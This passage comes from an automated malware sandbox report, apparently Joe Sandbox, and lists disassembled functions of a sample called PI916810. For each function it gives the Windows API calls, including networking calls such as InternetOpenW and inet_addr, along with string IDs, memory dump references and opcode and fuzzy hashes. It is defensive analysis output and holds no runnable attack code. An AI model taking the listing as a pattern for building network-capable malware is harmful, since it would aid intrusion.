                                                                                                                                                                            • Opcode Fuzzy Hash: c857f6a15f1d99947e55a827f0caaf5c27ac855d2e4b4632f272c16a48ca8958
                                                                                                                                                                            • Instruction Fuzzy Hash: F65102786087418FC750CF18C580A1ABBE1BFAA344F54885EE9819B361E335EC95CF97
                                                                                                                                                                            Function 004D2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004D2892
                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004D28C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CrackInternet_memset
                                                                                                                                                                            • String ID: |
                                                                                                                                                                            • API String ID: 1413715105-2343686810
                                                                                                                                                                            • Opcode ID: 5df8307c025d13a7edc4edfa0165eebd462ced1d4fb4dc137b5a1d6bf1d91ad2
                                                                                                                                                                            • Instruction ID: c2fa323f36b75f4945c314532894f3ad5d2fb194ec04c891bf6b4e64182e3498
                                                                                                                                                                            • Opcode Fuzzy Hash: 5df8307c025d13a7edc4edfa0165eebd462ced1d4fb4dc137b5a1d6bf1d91ad2
                                                                                                                                                                            • Instruction Fuzzy Hash: 97315D71900119AFCF01EFA1CC95EEEBFB8FF18314F10006AF814A6266EB355A16DB65
                                                                                                                                                                            Function 004E6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 004E6D86
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004E6DC2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                            • Opcode ID: f6b3eafff60ef2c1074e11b315487e5fb53c34910492c9234e73890e643f00e0
                                                                                                                                                                            • Instruction ID: 25103015ce246dbab721f50e1eef44f2eaaa00b338baf98cbd793dfe932402f4
                                                                                                                                                                            • Opcode Fuzzy Hash: f6b3eafff60ef2c1074e11b315487e5fb53c34910492c9234e73890e643f00e0
                                                                                                                                                                            • Instruction Fuzzy Hash: A131B071200244AEDB109F65CC80EFB73A9FF58364F51862EF8A987290DA34AC51CB68
                                                                                                                                                                            Function 004C2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2E00
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004C2E3B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                                                                            • Opcode ID: f00a4aa3db235dcb0b34234d3e75d3ddde8209be92779e9ba3a8c5d04b512213
                                                                                                                                                                            • Instruction ID: 7a6c3d87f0f8e5027759ddccd570879fb453cd9eab4b890cf4136998ebc70401
                                                                                                                                                                            • Opcode Fuzzy Hash: f00a4aa3db235dcb0b34234d3e75d3ddde8209be92779e9ba3a8c5d04b512213
                                                                                                                                                                            • Instruction Fuzzy Hash: D231E835500319ABDB64DF48CA45FDF7BB5EF05300F14442FE985A62A0D7F89944CB19
                                                                                                                                                                            Function 004E6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004E69D0
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E69DB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: Combobox
                                                                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                                                                            • Opcode ID: 6916e96b49ab91fc47a81be436aff1a7620d61dd0b1a64b258e5a86ee489544d
                                                                                                                                                                            • Instruction ID: ad8e1b3301c4eb183e062119246a29502a9764abfd12cadf2f34cfeae95d356a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6916e96b49ab91fc47a81be436aff1a7620d61dd0b1a64b258e5a86ee489544d
                                                                                                                                                                            • Instruction Fuzzy Hash: 6511E6B16002486FEF119F15CC80EBB376AEBA53A5F12012AF9589B392D6399C5187A4
                                                                                                                                                                            Function 004E6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
                                                                                                                                                                              • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
                                                                                                                                                                              • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004E6EE0
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 004E6EFA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                            • Opcode ID: 0680e000ace97c0ee2f2969914f5e4be20a7598458acee589ba0175fd9e4ec45
                                                                                                                                                                            • Instruction ID: 57501c8b0037cd849ae2af1310cfdd843918aea0f1462f5507415a3150e4144d
                                                                                                                                                                            • Opcode Fuzzy Hash: 0680e000ace97c0ee2f2969914f5e4be20a7598458acee589ba0175fd9e4ec45
                                                                                                                                                                            • Instruction Fuzzy Hash: 7021A63261024AAFDB04DFB8CC45AEA7BB8FB08305F00462AFD45D3241E638E8219B64
                                                                                                                                                                            Function 004E6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 004E6C11
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004E6C20
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                                                                            • String ID: edit
                                                                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                                                                            • Opcode ID: cdd5cd8f486c6b5a5664d17818de8770beb7ae02eb206a4f82d7c89f05454eb9
                                                                                                                                                                            • Instruction ID: 7c421520215ddd584c0c39a25422ce6a6d05e0a6f62044abdd967bc6473232a4
                                                                                                                                                                            • Opcode Fuzzy Hash: cdd5cd8f486c6b5a5664d17818de8770beb7ae02eb206a4f82d7c89f05454eb9
                                                                                                                                                                            • Instruction Fuzzy Hash: 36119D71100198AFEB104F659C41ABB3769EF253B9F214726F960D72E0C639EC919B68
                                                                                                                                                                            Function 004C2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2F11
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004C2F30
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                                                                            • Opcode ID: cb886650f23dffaf4367ca6c00715951b8507a47c78ea06c4260657d78d63a9d
                                                                                                                                                                            • Instruction ID: 3db674fecb869e40c37d6b43cd47386088edda48a2b87015109a4a0b69c13644
                                                                                                                                                                            • Opcode Fuzzy Hash: cb886650f23dffaf4367ca6c00715951b8507a47c78ea06c4260657d78d63a9d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F11D339901118ABCB60DB58DE44F9A77B9EB12310F1400AFE844B73A0D7F4ED059799
                                                                                                                                                                            Function 004D24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004D2520
                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004D2549
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                            • Opcode ID: 4562acc6e6a95dab70550949bdedac07c6c02e5b8d9db9d226989e9aa23e8984
                                                                                                                                                                            • Instruction ID: d60ec0411f704eeedcac16075ad9dc68550016c323c50127948897de08eb9a08
                                                                                                                                                                            • Opcode Fuzzy Hash: 4562acc6e6a95dab70550949bdedac07c6c02e5b8d9db9d226989e9aa23e8984
                                                                                                                                                                            • Instruction Fuzzy Hash: 82113270101221BADB258F119DB8EFBFFA8FF26350F00812BF90456340D2B46981CAF5
                                                                                                                                                                            Function 004D80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004D830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,004D80C8,?,00000000,?,?), ref: 004D8322
                                                                                                                                                                            • inet_addr.WSOCK32(00000000), ref: 004D80CB
                                                                                                                                                                            • htons.WSOCK32(00000000), ref: 004D8108
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                            • API String ID: 2496851823-2422070025
                                                                                                                                                                            • Opcode ID: bf208b4d4cb672c2620903d7a973bf035e3fe031e6ddc55223313e860208bbc5
                                                                                                                                                                            • Instruction ID: fc1cc39e01caa44ffba77597b907ae33c2f8315213e4f95e7087cc6521193d76
                                                                                                                                                                            • Opcode Fuzzy Hash: bf208b4d4cb672c2620903d7a973bf035e3fe031e6ddc55223313e860208bbc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11A574600205ABDB20AF64CC96FFEB764FF04324F10852FE91197392DA76A815C659
                                                                                                                                                                            Function 00470A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00463C26,005262F8,?,?,?), ref: 00470ACE
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004A50E1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                                            • String ID: cR
                                                                                                                                                                            • API String ID: 257928180-797219872
                                                                                                                                                                            • Opcode ID: bb793c1b5e882ff8794395d768099f186490dbea5fd5ed9b52b25fcca5474b1d
                                                                                                                                                                            • Instruction ID: 260c69645322b8ec1c5d099d473e0b8f4e71daef3d4927e04d3d38d72ef5c599
                                                                                                                                                                            • Opcode Fuzzy Hash: bb793c1b5e882ff8794395d768099f186490dbea5fd5ed9b52b25fcca5474b1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5711CC31904218DB8B10EBB5DD01EDD77F8FF18358B1044ABBA4CD7291EA78EB888759
                                                                                                                                                                            Function 004B92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004B9355
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                                                                            • Opcode ID: 7025caaebda860a66b51a89d2a10637451d3e9f91d15723ee04636c9ba6022db
                                                                                                                                                                            • Instruction ID: 460cef6a89c49b43efa0946721d380eb474ff227888c8e5c3f89d9f37e1b74ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 7025caaebda860a66b51a89d2a10637451d3e9f91d15723ee04636c9ba6022db
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B01D271A45214AB8B08FBA5CC91CFE77A9FF06320B10061AF972572D2EA3959088665
                                                                                                                                                                            Function 004B91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 004B924D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                                                                            • Opcode ID: c5d1929b6e87d5d29144a796e89351d82e2a0db40433af45cdabba17f127378e
                                                                                                                                                                            • Instruction ID: 28aad9450364a951c267e8c14321ebf90c47c135dd2af0368c9539b151b25330
                                                                                                                                                                            • Opcode Fuzzy Hash: c5d1929b6e87d5d29144a796e89351d82e2a0db40433af45cdabba17f127378e
                                                                                                                                                                            • Instruction Fuzzy Hash: B701D871E4120477CB08E7A1C892EFF77A8DF05304F14005BB61267282EA185F1C82B6
                                                                                                                                                                            Function 004B9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 004B92D0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                                                                            • Opcode ID: b2e1c62649282a7ca7c956ef68adfae76e1061c7aee2ae1f048b393d16e472c0
                                                                                                                                                                            • Instruction ID: a7ed9f18f04b8c865e38e5dcd9c23b588220be7513ed1a58a19b344918e35e9d
                                                                                                                                                                            • Opcode Fuzzy Hash: b2e1c62649282a7ca7c956ef68adfae76e1061c7aee2ae1f048b393d16e472c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 0401A771E4120477DB09F7A1C992EFF77AC9F11304F24055BB912632C2EA195F0C927A
                                                                                                                                                                            Function 00486DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __calloc_crt
                                                                                                                                                                            • String ID: @RR
                                                                                                                                                                            • API String ID: 3494438863-2184403932
                                                                                                                                                                            • Opcode ID: 85f9429872130fb81488f70cc9cc8d620c7f1badd1e958cf54367c6ed5fe9f4c
                                                                                                                                                                            • Instruction ID: d17d6d3852880e9b315eed2a1fd68476dfc498250bb6c782dc99e436e02a2577
                                                                                                                                                                            • Opcode Fuzzy Hash: 85f9429872130fb81488f70cc9cc8d620c7f1badd1e958cf54367c6ed5fe9f4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF0C279308216DBF778EF19BC016AA27D5FB12324B11082FE104CB2C0EB3888869789
